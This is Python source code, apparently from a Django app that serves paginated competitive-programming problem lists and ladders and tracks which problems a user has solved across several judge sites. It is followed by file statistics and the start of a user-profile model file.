solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
True,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
if not completed:
res['meta']['completed'] = False
return response.Response(res)
else:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
temp = {'F': True, 'A': True, 'U': True}
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
False,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class TopicwiseGetLadderView(generics.ListAPIView):
serializer_class = GetLadderSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class TopicWiseLadderRetrieveView(generics.RetrieveAPIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page_size = 6
name = curr_list.name
description = curr_list.description
difficulty = None
video_link = None
contest_link = None
editorial = None
first_time = True
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
path = request.build_absolute_uri('/lists/topicwise/ladder/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
if user is not None:
if not LadderStarted.objects.filter(ladder_user=user,
ladder=curr_list).exists():
LadderStarted.objects.create(ladder_user=user,
ladder=curr_list)
problem_qs = curr_list.problem.all()
if user:
temp = ['F']
if Profile.objects.get(owner=user).spoj != None:
temp.append('S')
if Profile.objects.get(owner=user).uva_handle != None:
temp.append('U')
if Profile.objects.get(owner=user).atcoder != None:
temp.append('A')
if Profile.objects.get(owner=user).codechef != None:
temp.append('C')
problem_qs = problem_qs.filter(platform__in=temp)
cnt = int(problem_qs.count() / page_size)
if problem_qs.count() % page_size != 0:
cnt += 1
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
problem_qs = problem_qs.order_by('rating', 'id')
page = 1
curr_prob = None
curr_page = None
completed = False
if user:
completed = True
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder_scraper_check(user, ele)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
curr_prob = ele.prob_id
curr_page = page
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
if self.request.GET.get('page', None):
page = self.request.GET.get('page', None)
completed = False
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'curr_prob':
curr_prob,
'curr_unsolved_page':
curr_page,
'completed':
completed,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/ladder/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class LevelwiseGetListView(generics.ListAPIView):
serializer_class = GetSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class LevelwiseRetrieveView(views.APIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
page_size = 6
description = curr_list.description
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
problem_qs = curr_list.problem.all().order_by('rating', 'id')
total = curr_list.problem.all().count()
cnt = total // page_size
if total % page_size != 0:
cnt += 1
path = request.build_absolute_uri('/lists/levelwise/list/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
completed = True
if not page:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
page = 1
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
True,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/levelwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
if not completed:
res['meta']['completed'] = False
return response.Response(res)
else:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
temp = {'F': True, 'A': True, 'U': True}
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
False,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class LevelwiseGetLadderView(generics.ListAPIView):
serializer_class = GetLadderSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class LevelwiseLadderRetrieveView(generics.RetrieveAPIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page_size = 6
name = curr_list.name
description = curr_list.description
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
path = request.build_absolute_uri('/lists/levelwise/ladder/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
if user is not None:
if not LadderStarted.objects.filter(ladder_user=user,
ladder=curr_list).exists():
LadderStarted.objects.create(ladder_user=user,
ladder=curr_list)
problem_qs = curr_list.problem.all()
if user:
temp = ['F']
if Profile.objects.get(owner=user).spoj != None:
temp.append('S')
if Profile.objects.get(owner=user).uva_handle != None:
temp.append('U')
if Profile.objects.get(owner=user).atcoder != None:
temp.append('A')
if Profile.objects.get(owner=user).codechef != None:
temp.append('C')
problem_qs = problem_qs.filter(platform__in=temp)
cnt = int(problem_qs.count() / page_size)
if problem_qs.count() % page_size != 0:
cnt += 1
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
problem_qs = problem_qs.order_by('rating', 'id')
page = 1
curr_prob = None
curr_page = None
completed = False
if user:
completed = True
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder_scraper_check(user, ele)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
curr_prob = ele.prob_id
curr_page = page
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
if self.request.GET.get('page', None):
page = self.request.GET.get('page', None)
completed = False
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'curr_prob':
curr_prob,
'curr_unsolved_page':
curr_page,
'completed':
completed,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/levelwise/ladder/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
# class updateLadderview(generics.GenericAPIView):
# serializer_class = UpdateLadderSerializer
# def post(self,request,*args, **kwargs):
# prob_id = self.request.GET.get('prob_id')
# if prob_id == None:
# codeforces(self.request.user.username)
# uva(self.request.user.username)
# atcoder(self.request.user.username)
# else:
# if Problem.objects.filter(prob_id=prob_id,platform='F').exists():
# codeforces(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='U').exists():
# uva(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='A').exists():
# atcoder(self.request.user.username)
# if Problem.objects.filter(prob_id=prob_id,platform='C').exists():
# codechef(self.request.user.username,prob_id)
# if Problem.objects.filter(prob_id=prob_id,platform='S').exists():
# spoj(self.request.user.username,prob_id)
# return response.Response({'status' : "OK",'result' : 'ladder updated'},status = status.HTTP_200_OK)
# class updateListView(generics.GenericAPIView):
# serializer_class = UpdateListSerializer
# def post(self,request,*args,**kwargs):
# list_slug = self.request.GET.get('slug')
# page = self.request.GET.get('page')
# if list_slug is None or list_slug == "" :
# return response.Response(data={'status' : 'FAILED','error' : 'No list provided'})
# curr_list = List.objects.get(slug=list_slug)
# cnt = int(curr_list.problem.all().count()/page_size)
# if curr_list.problem.all().count() % page_size != 0:
# cnt += 1
# if page is None or page == "":
# return response.Response(data={'status' : 'FAILED','error' :'No page provided'})
# if page > cnt:
# return response.Response(data={'status' : 'FAILED','error' :'Page out of bounds'})
# #set page size here and in the serializer list waala
# page_size = 6
# problem_qs = curr_list.problem.all().order_by('rating')
# paginator = Paginator(problem_qs,page_size)
# qs = paginator.page(page)
# check = {'S' : set(),'U' : 0,'C' : set(),'F' : 0,'A' : 0}
# for prob in qs:
# platform = prob.platform
# if not Solved.objects.filter(user=self.request.user,problem__prob_id=prob.prob_id).exists():
# if platform == 'S' or platform == 'C':
# check[platform].add(prob.prob_id)
# else:
# check[platform] += 1
# print(check)
# if check['F'] > 0:
# cron_codeforces(self.request.user.username)
# if check['U'] > 0:
# cron_uva(self.request.user.username)
# if check['A'] > 0:
# cron_atcoder(self.request.user.username)
# if len(check['S']) > 0:
# for item in check['S']:
# spoj(self.request.user.username,item)
# if len(check['C']) > 0:
# list1 = codechef_list(self.request.user.username)
# list2 = check['C']
# final = set((list1) & (list2))
# for ele in final:
# prob = Problem.objects.get(prob_id=ele,platform='C')
# user = self.request.user
# Solved.objects.create(user=user,problem=prob)
# return response.Response(data={'status' : 'OK','result' :'list updated'})
class UserlistGetView(generics.ListAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = GetUserlistSerializer
def get_queryset(self):
if self.request.user.is_staff:
qs = List.objects.filter(
Q(owner=self.request.user) | Q(isAdmin=True))
return qs
else:
qs = List.objects.filter(owner=self.request.user)
return qs
class UserlistCreateView(generics.CreateAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = CreateUserlistSerializer
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user.username
return data
def perform_create(self, serializer):
return serializer.save(owner=self.request.user)
class UserlistAddProblemView(generics.CreateAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = UserlistAddSerializer
def post(self, request, *args, **kwargs):
data = request.data
prob_id = data.get('prob_id', None)
slug = data.get('slug', None)
platform = data.get('platform', None)
if prob_id is None or slug is None or platform is None:
return response.Response(
{
"status": 'FAILED',
'error': "prob_id or slug or platform not provided"
},
status=status.HTTP_400_BAD_REQUEST)
if not List.objects.filter(slug=slug).exists():
return response.Response(
{
"status": 'FAILED',
'error': "List with the provided slug does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
if not Problem.objects.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id and platform does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list = List.objects.get(slug=slug)
curr_prob = Problem.objects.get(prob_id=prob_id, platform=platform)
if curr_list.problem.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id and platform already exists within the list"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.problem.add(curr_prob)
return response.Response(
{
"status": 'OK',
'result': "Given problem has been added to the list"
},
status=status.HTTP_200_OK)
class EditUserlistView(generics.GenericAPIView):
permission_classes = [AuthenticatedActivated]
serializer_class = EditUserlistSerializer
def get_object(self, slug):
if self.request.user.is_staff:
if List.objects.filter((Q(isAdmin=True)
| Q(owner=self.request.user))
& Q(slug=slug)).exists():
return List.objects.get((Q(isAdmin=True)
| Q(owner=self.request.user))
& Q(slug=slug))
else:
raise NotFoundException(
"The list with the given slug does not exist")
else:
if List.objects.filter(Q(owner=self.request.user)
& Q(slug=slug)).exists():
return List.objects.get(
Q(owner=self.request.user) & Q(slug=slug))
else:
raise NotFoundException(
"The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
description = curr_list.description
public = curr_list.public
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
page_size = 10
problem_qs = curr_list.problem.all().order_by('rating', 'id')
path = request.build_absolute_uri('/lists/userlist/edit/' + str(slug) +
'?')
cnt = int(curr_list.problem.all().count() / page_size)
if curr_list.problem.all().count() % page_size != 0:
cnt += 1
if page is None:
page = '1'
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
return response.Response({
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": self.request.user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
self.request.user.username,
'completed':
False,
'name':
name,
'description':
description,
'public':
public,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/userlist/edit/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
})
def put(self, request, slug):
curr_list = self.get_object(slug)
data = request.data
name = data.get('name', None)
description = data.get('description', None)
public = data.get('public', None)
if name is not None:
if List.objects.filter(owner=self.request.user,
name=name).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"You already have a created a list with the same name "
},
status=status.HTTP_400_BAD_REQUEST)
else:
curr_list.name = name
if description is not None:
curr_list.description = description
if public is not None:
if public is not True and public is not False:
return response.Response(
{
"status":
'FAILED',
'error':
"public field can only be true or false (with the lowercase initial character)"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.public = public
if data.get('delete_probs', None):
for ele in data.get('delete_probs', None):
prob_id = ele.get('prob_id', None)
platform = ele.get('platform', None)
if not Problem.objects.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the prob_id " + ele +
" and platform " + platform + " does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_prob = Problem.objects.get(prob_id=prob_id,
platform=platform)
if not curr_list.problem.filter(prob_id=prob_id,
platform=platform).exists():
return response.Response(
{
"status":
'FAILED',
'error':
"Problem with the given prob_id " + ele +
" does not exists within the list"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list.problem.remove(curr_prob)
curr_list.save()
return response.Response(
{
"status": 'OK',
'result': "Userlist has been updated",
'slug': curr_list.slug
},
status=status.HTTP_200_OK)
def delete(self, request, slug):
curr_list = self.get_object(slug)
curr_list.delete()
return response.Response(
{
"status": "OK",
'result': 'list with the given slug deleted'
},
status=status.HTTP_200_OK)
# class EditUserlistView(generics.RetrieveUpdateDestroyAPIView):
# permission_classes = [AuthenticatedActivated]
# serializer_class = EditUserlistSerializer
# queryset = List.objects.all()
# lookup_field = 'slug'
# def get_queryset(self):
# if self.request.user.is_staff:
# return self.queryset.filter(Q(isAdmin = True) | Q(owner = self.request.user))
# else:
# return self.queryset.filter(owner=self.request.user)
# def get_serializer_context(self,**kwargs):
# data = super().get_serializer_context(**kwargs)
# data['user'] = self.request.user.username
# return data
# def update(self,request,**kwargs):
# data = request.data
# if data.get('delete_probs',None):
# for ele in data.get('delete_probs',None):
# prob_id = ele.get('prob_id',None)
# platform = ele.get('platform',None)
# if not Problem.objects.filter(prob_id = prob_id,platform = platform).exists():
# return response.Response({"status" : 'FAILED','error' :"Problem with the prob_id " + ele + " and platform " + platform + " does not exist"},status=status.HTTP_400_BAD_REQUEST)
# if not List.objects.filter(slug = data['slug']).exists():
# return response.Response({"status" : 'FAILED','error' :"List with the provided slug does not exist"},status=status.HTTP_400_BAD_REQUEST)
# curr_prob = Problem.objects.get(prob_id=prob_id,platform = platform)
# curr_list = List.objects.get(slug=data['slug'])
# if not curr_list.problem.filter(prob_id=prob_id,platform = platform).exists():
# return response.Response({"status" : 'FAILED','error' :"Problem with the given prob_id " + ele + " does not exists within the list"},status=status.HTTP_400_BAD_REQUEST)
# curr_list.problem.remove(curr_prob)
# return super().update(request,**kwargs)
class AddProblemsAdminView(generics.GenericAPIView):
permission_classes = [AuthenticatedAdmin]
serializer_class = AddProblemsAdminSerializer
def post(self, request, *args, **kwargs):
data = request.data
slug = data.get('slug', None)
l = data.get('l', 0)
r = data.get('r', 5000)
if not slug:
return response.Response(
{
"status": 'FAILED',
'error': "slug not provided"
},
status=status.HTTP_400_BAD_REQUEST)
if not List.objects.filter(slug=slug).exists():
return response.Response(
{
"status": 'FAILED',
'error': "List with the provided slug does not exist"
},
status=status.HTTP_400_BAD_REQUEST)
curr_list = List.objects.get(slug=slug)
final = set()
wrong = set()
double = set()
rating_l = set()
rating_r = set()
if data.get('prob_id', None):
for ele in data.get('prob_id', None):
final.add(ele)
for ele in final:
if not Problem.objects.filter(prob_id=ele).exists():
wrong.add(ele)
continue
if Problem.objects.filter(prob_id=ele).count() > 1:
double.add(ele)
continue
if curr_list.problem.filter(prob_id=ele).exists():
continue
curr_prob = Problem.objects.get(prob_id=ele)
if curr_prob.rating <= l:
rating_l.add(ele)
elif curr_prob.rating > r:
rating_r.add(ele)
else:
curr_list.problem.add(curr_prob)
return response.Response(
{
"status": 'OK',
'result':
"The correct problems have been inserted in the list",
'wrong': wrong,
'double': double,
'rating_l': rating_l,
'rating_r': rating_r
},
status=status.HTTP_200_OK)
from .cron import updater
from django.http import JsonResponse
def testing(request):
updater()
return JsonResponse({'status': 'OK'})
| 38.134588
| 197
| 0.442867
| 4,758
| 52,702
| 4.784153
| 0.052333
| 0.028819
| 0.044458
| 0.044282
| 0.845934
| 0.826956
| 0.787242
| 0.766815
| 0.756842
| 0.739665
| 0
| 0.006995
| 0.454765
| 52,702
| 1,381
| 198
| 38.162201
| 0.785175
| 0.102064
| 0
| 0.817878
| 0
| 0
| 0.077016
| 0.005717
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019215
| false
| 0
| 0.011696
| 0.000835
| 0.108605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e135752bb040618ca7149843e1b038d01a5fc4cc
| 6,650
|
py
|
Python
|
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
accounts/models.py
|
Ronak-23/varchas
|
18eed0f1f94c5252212134e6e26ff8a802bed8d9
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class UserProfile(models.Model):
ACCOMMODATION_CHOICES = (
('N', 'No'),
('Y', 'Yes'),
)
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('T', 'Other'),
)
DAYS_CHOICES = (
('1', 'One'),
('2', 'Two'),
('3', 'Three'),
('4', 'Four'),
)
STATE_CHOICES = (
('1', 'Andhra Pradesh'),
('2', 'Arunachal Pradesh'),
('3', 'Assam'),
('4', 'Bihar'),
('5', 'Chhattisgarh'),
('6', 'Goa'),
('7', 'Gujarat'),
('8', 'Haryana'),
('9', 'Himachal Pradesh'),
('10', 'Jammu & Kashmir'),
('11', 'Jharkhand'),
('12', 'Karnataka'),
('13', 'Kerala'),
('14', 'Madhya Pradesh'),
('15', 'Maharashtra'),
('16', 'Manipur'),
('17', 'Meghalaya'),
('18', 'Mizoram'),
('19', 'Nagaland'),
('20', 'Odisha'),
('21', 'Punjab'),
('22', 'Rajasthan'),
('23', 'Sikkim'),
('24', 'Tamil Nadu'),
('25', 'Telangana'),
('26', 'Tripura'),
('27', 'Uttarakhand'),
('28', 'Uttar Pradesh'),
('29', 'West Bengal'),
('30', 'Andaman & Nicobar Islands'),
('31', 'Delhi'),
('32', 'Chandigarh'),
('33', 'Dadra & Naagar Haveli'),
('34', 'Daman & Diu'),
('35', 'Lakshadweep'),
('36', 'Puducherry'),
)
user = models.OneToOneField(User, on_delete=models.CASCADE)
phone = models.CharField(max_length=11)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default='M')
college = models.CharField(max_length=128)
state = models.CharField(max_length=2, choices=STATE_CHOICES)
accommodation_required = models.CharField(max_length=1, choices=ACCOMMODATION_CHOICES, blank=True)
accomodation_type = models.CharField(max_length=1, default=1)
amount_required = models.PositiveSmallIntegerField(default=0, blank=True)
amount_paid = models.PositiveSmallIntegerField(default=0, blank=True)
no_of_days = models.CharField(max_length=1, choices=DAYS_CHOICES)
id_issued = models.BooleanField(default=False)
qr_code = models.ImageField(upload_to='qr_code', blank=True, null=True)
teamId = models.ForeignKey("registration.TeamRegistration", on_delete=models.SET_NULL, null=True, related_name="member")
def __str__(self):
return self.user.username
class EsportsUserProfile(models.Model):
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('T', 'Other'),
)
